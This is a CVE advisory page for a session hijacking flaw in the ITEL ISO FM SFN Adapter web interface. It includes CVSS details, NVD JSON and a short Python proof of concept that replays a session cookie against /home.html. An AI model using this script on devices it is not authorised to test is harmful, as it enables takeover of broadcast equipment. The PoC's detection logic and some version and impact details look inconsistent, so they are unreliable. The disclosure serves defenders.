Security Vulnerability Report
中文
CVE-2025-63219 CVSS 7.5 HIGH

CVE-2025-63219

Published: 2025-11-19 15:15:51
Last Modified: 2026-01-12 16:04:31

Description

The ITEL ISO FM SFN Adapter (firmware ISO2 2.0.0.0, WebServer 2.0) is vulnerable to session hijacking due to improper session management on the /home.html endpoint. An attacker can access an active session without authentication, allowing them to control the device, modify configurations, and compromise system integrity.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:itel:iso-fm_firmware:2.0.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:itel:iso-fm:-:*:*:*:*:*:*:* - NOT VULNERABLE
ITEL ISO FM SFN Adapter 固件 ISO2 < 2.0.0.0
ITEL ISO FM SFN Adapter WebServer < 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-63219 PoC - ITEL ISO FM SFN Adapter Session Hijacking Note: This PoC is for authorized security testing only. """ import requests import sys TARGET = "http://target-device.local" # Replace with actual target IP SESSION_ID = "test_session_id" # Replace with captured/guessed session ID def check_vulnerability(): """Check if target is vulnerable to session hijacking""" url = f"{TARGET}/home.html" headers = { 'Cookie': f'SESSIONID={SESSION_ID}', 'User-Agent': 'Mozilla/5.0 (Security Test)' } try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: if 'session' not in response.text.lower() or 'login' not in response.text.lower(): print(f"[+] VULNERABLE: Session hijacking possible via {url}") return True else: print("[-] Target may not be vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") return False if __name__ == "__main__": print("CVE-2025-63219 - ITEL ISO FM SFN Adapter Session Hijacking") check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63219", "sourceIdentifier": "[email protected]", "published": "2025-11-19T15:15:50.600", "lastModified": "2026-01-12T16:04:30.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ITEL ISO FM SFN Adapter (firmware ISO2 2.0.0.0, WebServer 2.0) is vulnerable to session hijacking due to improper session management on the /home.html endpoint. An attacker can access an active session without authentication, allowing them to control the device, modify configurations, and compromise system integrity."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:itel:iso-fm_firmware:2.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "47B70A60-DAED-41D3-AA89-3D9CCBDE7A80"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:itel:iso-fm:-:*:*:*:*:*:*:*", "matchCriteriaId": "86889A64-CE85-41B0-93FC-289A5BED5189"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63219_ITEL%20ISO%20FM%20SFN%20Adapter%20-%20Session%20Hijacking", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.itel.it/", "source": "[email protected]", "tags": ["Product"]}]}}